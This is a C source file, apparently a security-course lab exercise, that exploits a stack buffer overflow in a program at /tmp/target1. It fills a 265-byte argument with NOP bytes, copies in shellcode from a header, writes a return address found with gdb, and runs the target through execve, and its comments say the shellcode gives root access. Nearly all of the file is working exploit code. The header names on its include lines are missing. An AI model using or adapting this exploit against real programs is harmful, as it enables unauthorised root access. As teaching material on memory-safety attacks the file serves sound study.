#include #include #include #include "shellcode.h" // so the way we'll do the exploit is to write a program // that invokes our target program with carefully chosen // arguments int main(void) { char *args[3]; // the argv that main in our target program will be passed char *env[1]; // environment variables, we won't actually need to do anything with this args[0] = "/tmp/target1"; // the first argument is always the name of the executable args[2] = NULL; // mark the end of the arguments env[0] = NULL; // nothing to do with environment variables // args[1] will be our attack string // how big should we make it? 256 bytes to fill up the buffer, // 4 bytes to get past the saved ebp, 4 bytes to actually overwrite // the return address, and 1 more for the null terminator = 265 args[1] = malloc(265); memset(args[1], 0x90, 264); // sets the first 264 bytes to the NOP instruction // the NOP instruction just does nothing, so we start off filling our attack // string with it // in particular, we can't afford to have any stray 0's in the attack since // that might cut it off being interpreted as a null terminator args[1][264] = '\0'; // speaking of null terminator, we stick one at the end memcpy(args[1], shellcode, strlen(shellcode)); // copies the bytes from shellcode over to the beginning of our attack string // what is shellcode you ask -- it's a carefully crafted set of instructions // that when executed will give us root access to the machine // it has been previous defined in a header file "shellcode.h" // all that remains is to put in the address we want to overwrite foo's // return address // we want this to point back to the start of the buffer where we've written // the shellcode that will give us access to the machine // unfortunately, we don't know what this address is -- it won't be the same // as when we used gdb on target1 because invoking target1 from this program // will change things // for now I'll put in a dummy address // ok, using gdb I found the buffer address to be 0xffffdc5c *(unsigned int*)(args[1] + 260) = 0xffffdc5c; execve("/tmp/target1", args, env); }